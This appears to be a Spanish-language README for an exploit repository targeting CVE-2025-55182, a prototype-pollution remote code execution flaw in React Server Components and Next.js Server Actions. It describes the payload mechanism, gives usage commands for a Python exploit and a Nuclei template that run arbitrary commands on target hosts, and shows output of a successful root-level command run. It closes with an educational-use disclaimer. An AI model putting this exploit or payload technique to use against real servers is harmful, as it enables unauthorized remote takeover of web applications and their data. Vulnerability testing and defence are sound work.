
CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface
Exploit completo de Ejecución Remota de Código y escáner para CVE-2025-55182 en Server Actions de React/Next.js.
PoC original: Spritualkb/CVE-2025-55182-exp
CVE-2025-55182 es una vulnerabilidad crítica de contaminación de prototipos en React Server Components que permite la ejecución remota de código. Este repositorio proporciona tanto herramientas de escaneo automatizado (plantilla Nuclei) como de explotación manual (script Python).
Mecanismo de la vulnerabilidad:
El exploit aprovecha la contaminación de prototipos en la deserialización del Protocolo de Vuelo de React. Contamina Object.prototype.then mediante "$1:__proto__:then" y obtiene acceso al constructor de funciones a través de _formData.get establecido en "$1:constructor:constructor", luego inyecta código malicioso mediante _prefix que es ejecutado por Function().
cve-2025-55182.yaml)Escáner automatizado de vulnerabilidades que ejecuta el comando id y recupera la salida a través de la cabecera X-Action-Redirect.
Uso:
nuclei -u http://target.com:3000 -t cve-2025-55182.yaml
Características:
id) para verificar RCECVE-2025-55182.py)Script de explotación RCE completo que ejecuta comandos arbitrarios y recupera la salida.
Uso:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
Características:
X-Action-Redirect$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
$ python3 CVE-2025-55182.py http://localhost:3001 -c "id"
============================================================
CVE-2025-55182 RCE Exploit
React Server Components Remote Code Execution
============================================================
[*] Target: http://localhost:3001
[*] Command: id
[*] Building payload...
[*] Sending exploit payload...
============================================================
[+] Command executed successfully!
============================================================
[+] Command Output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
------------------------------------------------------------
============================================================
[*] Exploitation attempt completed
============================================================
SOLO CON FINES EDUCATIVOS Y DE PRUEBAS AUTORIZADAS